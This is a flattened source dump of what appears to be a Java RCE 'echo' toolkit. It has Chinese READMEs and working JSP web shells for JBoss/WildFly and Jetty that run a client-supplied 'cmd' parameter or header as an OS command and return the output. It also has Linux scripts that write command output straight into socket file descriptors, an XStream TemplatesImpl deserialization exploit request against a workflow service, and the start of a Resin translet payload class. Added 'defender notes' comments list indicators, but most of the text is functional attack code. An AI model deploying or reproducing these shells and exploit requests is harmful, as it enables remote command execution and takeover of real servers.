├── JBoss(Wildfly)
├── README.md
├── code
│ └── JBossEcho.jsp
└── img
│ └── JBossEcho.png
├── Jetty
├── README.md
├── code
│ ├── jetty789Echo.jsp
│ ├── jetty78Echo.jsp
│ └── jetty9Echo.jsp
└── img
│ ├── 001.png
│ ├── 20200628001.png
│ ├── 20200628002.png
│ └── 20200628003.png
├── Linux
├── README.md
├── code
│ ├── case1.jsp
│ ├── case2-Deprecated.jsp
│ └── case2.jsp
└── imgs
│ ├── 20200621-001.png
│ ├── 20200621-002.png
│ ├── 20200621-003.png
│ └── 20200621-004.png
├── README.md
├── Resin
├── README.md
├── code
│ ├── doCreateWorkflowRequest.xml
│ ├── resinEcho.java
│ ├── resinEcho.jsp
│ ├── resinEcho.xml
│ ├── submitWorkflowRequest.xml
│ └── xmlRceWeaver.java
└── img
│ ├── 001.png
│ ├── 002.png
│ └── 003.png
├── Spring
├── README.md
├── code
│ ├── SpringMVCTestController.java
│ └── SpringWebFlowTestController.java
└── imgs
│ └── 20200621-001.png
├── Tomcat
├── Java Object Searcher search result
│ ├── tomat 6.0.53 result.txt
│ ├── tomcat 7.0.34 result.txt
│ ├── tomcat 7.0.96 result.txt
│ ├── tomcat 8.0.48 result.txt
│ ├── tomcat 8.5.53 result.txt
│ └── tomcat 9.0.33 result.txt
├── README.md
├── code
│ ├── Tomcat6Echo-deprecated.jsp
│ ├── Tomcat78Echo-deprecated.jsp
│ ├── Tomcat9Echo-deprecated.jsp
│ ├── TomcatEcho-全版本.jsp
│ ├── TomcatEchoTypeB-全版本.jsp
│ └── 根据网上流传的xary payload提取的tomcat回显字节码文件.class
└── imgs
│ ├── Tomcat6 Search Result.png
│ ├── Tomcat6.png
│ ├── Tomcat7 Search Result.png
│ ├── Tomcat7.png
│ ├── Tomcat8 Search Result.png
│ ├── Tomcat8.5 Search Result.png
│ ├── Tomcat8.5.png
│ ├── Tomcat8.png
│ ├── Tomcat9 Search Result.png
│ └── Tomcat9.png
├── Websphere
├── README.md
├── code
│ └── websphereEcho.jsp
└── img
│ └── 001.png
├── Windows
├── README.md
├── code
│ ├── WindowsEcho-Deprecated.jsp
│ └── WindowsEcho.jsp
└── img
│ ├── Jetty.png
│ ├── Resin.png
│ └── Tomcat.png
├── weblogic
├── README.md
├── code
│ ├── WeblogicEcho.jsp
│ ├── weblogic-10.0.3-deprecated.jsp
│ └── weblogic-12.1.3-deprecated.jsp
└── img
│ ├── x001.png
│ └── x002.png
├── 全自动挖掘 request 回显
├── README.md
├── code
│ ├── Step1-deprecated.jsp
│ ├── Step1.jsp
│ ├── Step2-deprecated.jsp
│ └── Step2.jsp
└── img
│ ├── step1.png
│ └── step2.png
├── 写文件
├── README.md
├── code
│ └── writeFile.jsp
└── img
│ ├── 001.png
│ └── 002.png
└── 集成到ysoserial
└── DirectiveProcessor.java
/JBoss(Wildfly)/README.md:
--------------------------------------------------------------------------------
1 | # JBoss(Wildfly) 回显
2 |
3 | ## 效果
4 | ![JBossEcho](./img/JBossEcho.png)
5 |
6 | ## 参考
7 | [https://developer.jboss.org/thread/169877](https://developer.jboss.org/thread/169877)
8 |
--------------------------------------------------------------------------------
/JBoss(Wildfly)/code/JBossEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
// Command-execution web shell for JBoss/WildFly (Undertow): the "cmd" request parameter
// is run as an OS command and the process stdout is streamed back to the client.
// Defender notes: the request is taken from the JACC PolicyContext and the output goes
// through the Undertow exchange; the JSP's implicit request/response objects are not used.
// Useful indicators: a JSP referencing PolicyContext.getContext together with Runtime.exec,
// and the application-server JVM spawning child processes.
3 | io.undertow.servlet.spec.HttpServletRequestImpl req = (io.undertow.servlet.spec.HttpServletRequestImpl) javax.security.jacc.PolicyContext.getContext("javax.servlet.http.HttpServletRequest");
// Untrusted input: client-controlled parameter, passed to exec() below without validation.
4 | String cmd = req.getParameter("cmd");
5 | if(cmd != null && !cmd.isEmpty()) {
// Only stdout is read; the process's stderr and exit status are not consumed.
6 | java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
7 | java.io.OutputStream os = req.getExchange().getOutputStream();
8 |
// Copy the command output to the HTTP response in 1 KiB chunks.
9 | byte[] bytes = new byte[1024];
10 | int len = 0;
11 | while ((len = in.read(bytes)) != -1) {
12 | os.write(bytes, 0, len);
13 | }
14 |
15 | os.close();
16 | in.close();
17 | }
18 | %>
--------------------------------------------------------------------------------
/JBoss(Wildfly)/img/JBossEcho.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/JBoss(Wildfly)/img/JBossEcho.png
--------------------------------------------------------------------------------
/Jetty/README.md:
--------------------------------------------------------------------------------
1 | # Jetty Echo
2 | ## 说明
3 | 直接参考 ```c0ny1``` 文章中的截图,找到 ```httpConnection``` 对象,编写代码实现回显
4 | 
5 | 
6 |
7 | ## 效果
8 | 
9 |
10 | ## 踩坑
11 | 当拿到 ```httpConnection``` 对象时,想直接调用其 ```send``` 方法实现回显,发现报错。进一步测试发现,对拿到的 ```httpConnection``` 执行 ```instanceof HttpConnection``` 时返回 ```false```,
12 | 经过询问朋友 ```Pine.lin``` 才得知,我拿到的 ```httpConnection``` 对象和 ```import``` 进来的对象竟然使用的是不同的类加载器(很奇怪),从而导致了这个问题,导致我在这里卡了很久,
13 | 非常感谢 ```Pine.lin``` 的帮忙。
14 | 
15 |
16 | ## 参考
17 | * [半自动化挖掘request实现多种中间件回显](https://mp.weixin.qq.com/s/uWyHRexDZWQwp81lWjmqqw)
18 | * [https://www.eclipse.org/jetty/javadoc/current/org/eclipse/jetty/server/HttpConnection.html](https://www.eclipse.org/jetty/javadoc/current/org/eclipse/jetty/server/HttpConnection.html)
19 |
--------------------------------------------------------------------------------
/Jetty/code/jetty789Echo.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
// Command-execution web shell for Jetty: locates the connection object of the current
// request by reflecting over the current thread's ThreadLocal storage, runs the value of
// the "cmd" request header as an OS command, and prints its stdout to the response.
// Defender notes: indicators are reflective access to the private fields
// Thread.threadLocals -> "table" -> entry "value", a request header literally named "cmd",
// and the servlet-container JVM spawning child processes. On JDK 16 and later this
// reflective access to java.lang internals is refused by default unless the JVM was
// started with an --add-opens for java.lang; keep such flags as narrow as possible.
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getDeclaredField("threadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
// obj is now the thread's ThreadLocal map; read its backing entry array.
8 | field = obj.getClass().getDeclaredField("table");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Object[] obj_arr = (Object[]) obj;
13 | for(int i = 0; i < obj_arr.length; i++){
14 | Object o = obj_arr[i];
15 | if(o == null) continue;
16 |
// Read the value stored in this ThreadLocal entry.
17 | field = o.getClass().getDeclaredField("value");
18 | field.setAccessible(true);
19 | obj = field.get(o);
20 |
// Matching is by class-name suffix only. "AsyncHttpConnection" is tested first because
// it would also satisfy the broader "HttpConnection" suffix test in the second branch.
// Judging by the sibling file names, this branch presumably targets Jetty 7/8 - confirm.
21 | if(obj != null && obj.getClass().getName().endsWith("AsyncHttpConnection")){
22 | Object connection = obj;
23 | java.lang.reflect.Method method = connection.getClass().getMethod("getRequest", null);
24 | obj = method.invoke(connection, null);
25 |
// Untrusted input: client-controlled "cmd" header, passed to exec() without validation.
26 | method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
27 | String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
28 |
29 | if(cmd != null && !cmd.isEmpty()){
// Scanner with the "\\A" delimiter reads the whole stdout stream as a single token.
30 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
31 |
32 | method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
33 | java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
34 | printWriter.println(res);
35 | }
36 |
37 | break;
// Second branch: request and response are reached through the connection's HttpChannel.
// Judging by the sibling file names, this branch presumably targets Jetty 9 - confirm.
38 | }else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){
39 | java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null);
40 | Object httpChannel = method.invoke(obj, null);
41 |
42 | method = httpChannel.getClass().getMethod("getRequest", null);
43 | obj = method.invoke(httpChannel, null);
44 |
// Untrusted input: client-controlled "cmd" header, passed to exec() without validation.
45 | method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
46 | String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
47 | if(cmd != null && !cmd.isEmpty()){
48 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
49 |
50 | method = httpChannel.getClass().getMethod("getResponse", null);
51 | obj = method.invoke(httpChannel, null);
52 |
53 | method = obj.getClass().getMethod("getWriter", null);
54 | java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
55 | printWriter.println(res);
56 | }
57 |
58 | break;
59 | }
60 | }
61 | %>
--------------------------------------------------------------------------------
/Jetty/code/jetty78Echo.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
// Command-execution web shell for Jetty (7/8 according to the file name): finds the
// connection object of the current request in the thread's ThreadLocal storage via
// reflection, runs the "cmd" request header as an OS command and prints its stdout
// through the connection's PrintWriter.
// Defender notes: indicators are setAccessible() on Thread.threadLocals and on the
// ThreadLocal map's "table"/"value" fields, a request header named "cmd", and child
// processes spawned by the servlet-container JVM.
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getDeclaredField("threadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
// obj is now the thread's ThreadLocal map; read its backing entry array.
8 | field = obj.getClass().getDeclaredField("table");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Object[] obj_arr = (Object[]) obj;
13 | for(Object o : obj_arr){
14 | if(o == null) continue;
15 |
// Read the value stored in this ThreadLocal entry.
16 | field = o.getClass().getDeclaredField("value");
17 | field.setAccessible(true);
18 | obj = field.get(o);
// The target is recognised by class-name suffix only, not by type.
19 | if(obj != null && obj.getClass().getName().endsWith("AsyncHttpConnection")){
20 | Object connection = obj;
21 | java.lang.reflect.Method method = connection.getClass().getMethod("getRequest");
22 | obj = method.invoke(connection);
23 |
// Untrusted input: client-controlled "cmd" header, passed to exec() without validation.
24 | method = obj.getClass().getMethod("getHeader", String.class);
25 | String cmd = (String)method.invoke(obj, "cmd");
26 | if(cmd != null && !cmd.isEmpty()){
// Scanner with the "\\A" delimiter reads the whole stdout stream as a single token.
27 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
28 |
29 | method = connection.getClass().getMethod("getPrintWriter", String.class);
30 | java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
31 | printWriter.println(res);
32 | }
33 |
34 | break;
35 | }
36 | }
37 | %>
--------------------------------------------------------------------------------
/Jetty/code/jetty9Echo.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
// Command-execution web shell for Jetty (9 according to the file name): finds the
// HttpConnection of the current request in the thread's ThreadLocal storage via
// reflection, reaches the request and response through its HttpChannel, runs the "cmd"
// request header as an OS command and prints its stdout to the response writer.
// Defender notes: indicators are setAccessible() on Thread.threadLocals and on the
// ThreadLocal map's "table"/"value" fields, a request header named "cmd", and child
// processes spawned by the servlet-container JVM.
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getDeclaredField("threadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
// obj is now the thread's ThreadLocal map; read its backing entry array.
8 | field = obj.getClass().getDeclaredField("table");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Object[] obj_arr = (Object[]) obj;
13 | for(Object o : obj_arr){
14 | if(o == null) continue;
15 |
// Read the value stored in this ThreadLocal entry.
16 | field = o.getClass().getDeclaredField("value");
17 | field.setAccessible(true);
18 | obj = field.get(o);
// The target is recognised by class-name suffix only, not by type.
19 | if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){
20 | java.lang.reflect.Method method = obj.getClass().getMethod("getHttpChannel");
21 | Object httpChannel = method.invoke(obj);
22 |
23 | method = httpChannel.getClass().getMethod("getRequest");
24 | obj = method.invoke(httpChannel);
25 |
// Untrusted input: client-controlled "cmd" header, passed to exec() without validation.
26 | method = obj.getClass().getMethod("getHeader", String.class);
27 | String cmd = (String)method.invoke(obj, "cmd");
28 | if(cmd != null && !cmd.isEmpty()){
// Scanner with the "\\A" delimiter reads the whole stdout stream as a single token.
29 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
30 |
31 | method = httpChannel.getClass().getMethod("getResponse");
32 | obj = method.invoke(httpChannel);
33 |
34 | method = obj.getClass().getMethod("getWriter");
35 | java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
36 | printWriter.println(res);
37 | }
38 |
39 | break;
40 | }
41 | }
42 | %>
--------------------------------------------------------------------------------
/Jetty/img/001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Jetty/img/001.png
--------------------------------------------------------------------------------
/Jetty/img/20200628001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Jetty/img/20200628001.png
--------------------------------------------------------------------------------
/Jetty/img/20200628002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Jetty/img/20200628002.png
--------------------------------------------------------------------------------
/Jetty/img/20200628003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Jetty/img/20200628003.png
--------------------------------------------------------------------------------
/Linux/README.md:
--------------------------------------------------------------------------------
1 | # Linux 通用回显
2 |
3 | ## 说明
4 | * case1.jsp 中的代码逻辑较为简单,遍历当前进程 ```fd``` 目录下的所有和 ```socket``` 相关的 ```fd``` 文件,并输出结果,效果如下
5 | 
6 | 但是这种方法存在两个缺陷:
7 | * 会影响同一时间点所有访问网站的用户(也会看到自定义回显的结果)
8 | * 导致应用崩溃
9 | * 使用本地虚拟机 ```Kali Linux``` 搭建的 ```Tomcat 9.0.36``` 测试,Tomcat 进程不会崩溃
10 | * 使用 ```腾讯云VPS``` 搭建的 ```Tomcat 8.5.56``` 测试,连续访问此文件 ```8```次左右,应用崩溃(Tomcat 进程还在,但是不会再监听 ```8080``` 端口),且有时候重启 Tomcat 也没用,Tomcat 依然会报 ```java.io.IOException: Bad file descriptor``` 错误,需要重启 VPS
11 | 
12 | 
13 | * case2.jsp 中的代码通过延迟等方法来确定唯一正确的 ```fd``` 文件,不会影响访问网站的其他用户,也不会导致应用崩溃
14 | 
15 |
16 | ## 参考
17 | * [linux下java反序列化通杀回显方法的低配版实现](https://xz.aliyun.com/t/7307)
18 | * [通杀漏洞利用回显方法-linux平台](https://www.00theway.org/2020/01/17/java-god-s-eye/)
19 |
20 |
--------------------------------------------------------------------------------
/Linux/code/case1.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
// Writes the output of a fixed command ("ls -l") directly into every socket file
// descriptor held by the JVM process, bypassing the servlet response entirely.
// Defender notes: indicators are the app-server JVM spawning /bin/sh to list
// /proc/<pid>/fd, reflective use of the non-public java.io.FileDescriptor(int)
// constructor, and, as the accompanying README reports, other users receiving foreign
// output or "java.io.IOException: Bad file descriptor" errors in the server log.
// The shell's $PPID is its parent process, i.e. the JVM that launched it; the pipeline
// prints the fd number (column 9 of ls -l) of every entry that links to a socket.
3 | String command = "ls -l /proc/$PPID/fd|grep socket:|awk '{print $9}'";
4 |
5 | java.util.List list = new java.util.ArrayList<>();
6 | String[] cmd = new String[]{"/bin/sh", "-c", command };
7 | java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
8 |
// Collect one fd number per output line.
9 | String line;
10 | while ((line = br.readLine()) != null){
11 | list.add(line);
12 | }
13 |
14 | br.close();
15 |
// Obtain the non-public FileDescriptor(int) constructor so a descriptor object can be
// created for an arbitrary fd number.
16 | java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
17 | c.setAccessible(true);
18 |
19 | for(String s : list){
20 | Integer integer = Integer.parseInt(s);
21 |
22 | try{
23 | cmd = new String[]{"/bin/sh", "-c", "ls -l" };
24 | br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
25 |
26 | StringBuilder sb = new StringBuilder();
27 | while ((line = br.readLine()) != null){
28 | sb.append(line + "\n");
29 | }
30 |
// The same output is written to each socket fd in turn, whoever the peer is.
31 | java.io.FileOutputStream os = new java.io.FileOutputStream(c.newInstance(integer));
32 | os.write(sb.toString().getBytes());
33 |
34 | br.close();
// NOTE(review): closing the stream also closes the underlying descriptor, which the
// server presumably still owns - likely related to the failures the README describes.
35 | os.close();
// Every failure for an individual fd is silently ignored.
36 | }catch(Exception e){}
37 | }
38 | %>
--------------------------------------------------------------------------------
/Linux/code/case2-Deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
// Writes a hand-built HTTP response for a fixed command into a single socket file
// descriptor of the JVM process, chosen by comparing two snapshots of /proc/<pid>/fd
// taken two seconds apart. The servlet response object is not used.
// Defender notes: indicators are the app-server JVM spawning /bin/sh to list
// /proc/<pid>/fd twice, a two-second stall in the request, and reflective use of the
// non-public java.io.FileDescriptor(int) constructor. The reply is written straight to
// the socket, so it presumably does not pass through the container's normal response
// handling or logging - verify against access logs.
// Snapshot 1: socket inode numbers only (text after '[' with the trailing ']' removed).
3 | String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
4 | String[] cmd = new String[]{"/bin/sh", "-c", command };
5 | java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
6 | java.util.List res1 = new java.util.ArrayList();
7 | String line = "";
8 | while ((line = br.readLine()) != null){
9 | res1.add(line);
10 | }
11 | br.close();
12 |
13 | Thread.sleep((long)2000);
14 |
// Snapshot 2: "<fd number> socket:[<inode>]" for every socket entry.
15 | command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
16 | cmd = new String[]{"/bin/sh", "-c", command };
17 | br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
18 | java.util.List res2 = new java.util.ArrayList();
19 | while ((line = br.readLine()) != null){
20 | res2.add(line);
21 | }
22 | br.close();
23 |
// Among sockets present in both snapshots, keep the one with the largest inode number.
24 | int index = 0;
25 | int max = 0;
26 | for(int i = 0; i < res1.size(); i++){
27 | for(int j = 0; j < res2.size(); j++){
28 | if(((String)res2.get(j)).contains((String)res1.get(i))){
// substring(8) skips the "socket:[" prefix; the next line drops the closing "]".
29 | String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8);
30 | socketNo = socketNo.substring(0, socketNo.length() - 1);
31 | if(Integer.parseInt(socketNo) > max) {
32 | max = Integer.parseInt(socketNo);
33 | index = j;
34 | }
35 | }
36 | }
37 | }
38 |
// First column of the selected snapshot-2 line is the fd number.
39 | int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
40 | java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
41 | c.setAccessible(true);
// The command is hard-coded here; nothing is read from the request.
42 | cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" };
43 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
// Raw status line and headers are assembled by hand and written to the chosen fd.
44 | String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
45 | java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
46 | os.write(result.getBytes());
47 | %>
--------------------------------------------------------------------------------
/Linux/code/case2.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
// Writes a hand-built HTTP response for a fixed command ("id") into a single socket file
// descriptor of the JVM process, chosen by comparing two snapshots of /proc/<pid>/fd
// taken two seconds apart. The servlet response object is not used.
// Defender notes: indicators are the app-server JVM spawning /bin/sh to list
// /proc/<pid>/fd twice, a two-second stall in the request, and reflective use of the
// non-public java.io.FileDescriptor(int) constructor. The reply is written straight to
// the socket, so it presumably does not pass through the container's normal response
// handling or logging - verify against access logs.
// Runs only where the file separator is "/", i.e. on Unix-like hosts.
3 | if(java.io.File.separator.equals("/")){
// Snapshot 1: socket inode numbers only (text after '[' with the trailing ']' removed).
4 | String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
5 | String[] cmd = new String[]{"/bin/sh", "-c", command};
6 | java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
7 | java.util.List res1 = new java.util.ArrayList();
8 | String line = "";
// Reading stops at end of stream or at the first blank line.
9 | while ((line = br.readLine()) != null && !line.trim().isEmpty()){
10 | res1.add(line);
11 | }
12 | br.close();
13 |
14 | try {
15 | Thread.sleep((long)2000);
16 | } catch (InterruptedException e) {
17 | //pass
18 | }
19 |
// Snapshot 2: "<fd number> socket:[<inode>]" for every socket entry.
20 | command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
21 | cmd = new String[]{"/bin/sh", "-c", command};
22 | br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
23 | java.util.List res2 = new java.util.ArrayList();
24 | while ((line = br.readLine()) != null && !line.trim().isEmpty()){
25 | res2.add(line);
26 | }
27 | br.close();
28 |
// Among sockets present in both snapshots, track the largest inode number in max and
// store the matching position in index.
29 | int index = 0;
30 | int max = 0;
31 | for(int i = 0; i < res2.size(); i++){
32 | try{
// substring(8) skips the "socket:[" prefix; the next line drops the closing "]".
33 | String socketNo = ((String)res2.get(i)).split("\\s+")[1].substring(8);
34 | socketNo = socketNo.substring(0, socketNo.length() - 1);
35 | for(int j = 0; j < res1.size(); j++){
36 | if(!socketNo.equals(res1.get(j))) continue;
37 |
38 | if(Integer.parseInt(socketNo) > max) {
39 | max = Integer.parseInt(socketNo);
40 | index = j;
41 | }
42 | break;
43 | }
// Lines that cannot be parsed are skipped silently.
44 | }catch(Exception e){
45 | //pass
46 | }
47 | }
48 |
// First column of the selected snapshot-2 line is the fd number.
49 | int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
50 | java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
51 | c.setAccessible(true);
// The command is hard-coded here; nothing is read from the request.
52 | cmd = new String[]{"/bin/sh", "-c", "id"};
53 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
// Raw status line and headers are assembled by hand and written to the chosen fd.
54 | String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
55 | java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
56 | os.write(result.getBytes());
57 | }
58 | %>
--------------------------------------------------------------------------------
/Linux/imgs/20200621-001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Linux/imgs/20200621-001.png
--------------------------------------------------------------------------------
/Linux/imgs/20200621-002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Linux/imgs/20200621-002.png
--------------------------------------------------------------------------------
/Linux/imgs/20200621-003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Linux/imgs/20200621-003.png
--------------------------------------------------------------------------------
/Linux/imgs/20200621-004.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Linux/imgs/20200621-004.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Java RCE 回显
2 |
3 | ### 支持的回显测试代码
4 | - [x] Linux通用回显
5 | - [x] Windows通用回显
6 | - [x] Spring回显
7 | - [x] Tomcat通用回显 (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22)
8 | - [x] Weblogic (Tested on 10.3.6.0, 12.1.3.0.0)
9 | - [x] Websphere (Tested on AppServer V8.5(8.5.5.18), AppServer V9.0(9.0.5.5))
10 | - [x] JBoss(Wildfly) (Tested on 8.0.0.Final, 18.0.0.Final, 21.0.0.Beta1)
11 | - [x] Resin (Tested on pro-4.0.64, pro-4.0.57, pro-4.0.45, pro-4.0.32, failed on pro-3.1.15)
12 | - [x] Jetty (Tested on 9.4.30.v20200611, 9.3.28.v20191105, 9.2.29.v20191105, 9.0.7.v20131107, 8.1.21.v20160908, 7.6.21.v20160908,
13 | failed on 8.0.3.v20160908, 7.2.1.v20101111)
14 | - [x] 全自动挖掘 request 回显
15 | - [x] 写文件回显
16 |
17 | 如果有好的建议,欢迎提 ```issue```
18 |
--------------------------------------------------------------------------------
/Resin/README.md:
--------------------------------------------------------------------------------
1 | # Resin Echo
2 | ## 说明
3 | 直接参考 ```c0ny1``` 文章中的截图,找到 ```HttpRequest``` 对象,编写代码实现回显
4 | 
5 | 
6 |
7 | ## 效果
8 | 
9 |
10 | ## 参考
11 | * [半自动化挖掘request实现多种中间件回显](https://mp.weixin.qq.com/s/uWyHRexDZWQwp81lWjmqqw)
12 | * [http://javadoc4.caucho.com/com/caucho/server/http/HttpRequest.html](http://javadoc4.caucho.com/com/caucho/server/http/HttpRequest.html)
13 |
--------------------------------------------------------------------------------
/Resin/code/doCreateWorkflowRequest.xml:
--------------------------------------------------------------------------------
1 | POST /services%20/WorkflowServiceXml HTTP/1.1
2 | Host: 127.0.0.1:8080
3 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
4 | Content-Type: text/xml
5 | session:whoami
6 | Content-Length: 6581
7 | Connection: close
8 |
9 |
10 |
11 |
12 |
13 | <java.util.PriorityQueue serialization="custom">
14 | <unserializable-parents/>
15 | <java.util.PriorityQueue>
16 | <default>
17 | <size>2</size>
18 | <comparator class="org.apache.commons.beanutils.BeanComparator">
19 | <property>outputProperties</property>
20 | <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/>
21 | </comparator>
22 | </default>
23 | <int>3</int>
24 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
25 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
26 | <default>
27 | <__name>a</__name>
28 | <__bytecodes>
29 | <byte-array>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</byte-array>
30 | </__bytecodes>
31 | <__transletIndex>-1</__transletIndex>
32 | <__indentNumber>0</__indentNumber>
33 | </default>
34 | <boolean>false</boolean>
35 | </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
36 | </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
37 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
38 | </java.util.PriorityQueue>
39 | </java.util.PriorityQueue>
40 | 2
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/Resin/code/resinEcho.java:
--------------------------------------------------------------------------------
1 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
2 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
3 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
4 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
5 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
6 | import com.caucho.server.http.HttpResponse;
7 | import java.util.Scanner;
8 |
/**
 * Translet-shaped command-execution payload for Resin.
 *
 * <p>All work happens in the constructor, so the code runs as soon as the class is
 * instantiated. Extending {@code AbstractTranslet} matches the {@code TemplatesImpl}
 * based deserialization requests shown elsewhere in this listing; presumably this class
 * is what their elided byte-array carries (not verifiable from here).
 *
 * <p>Defender notes: the durable mitigation is upstream, in the deserializer: restrict
 * the types that may be instantiated from request data so that gadget classes such as
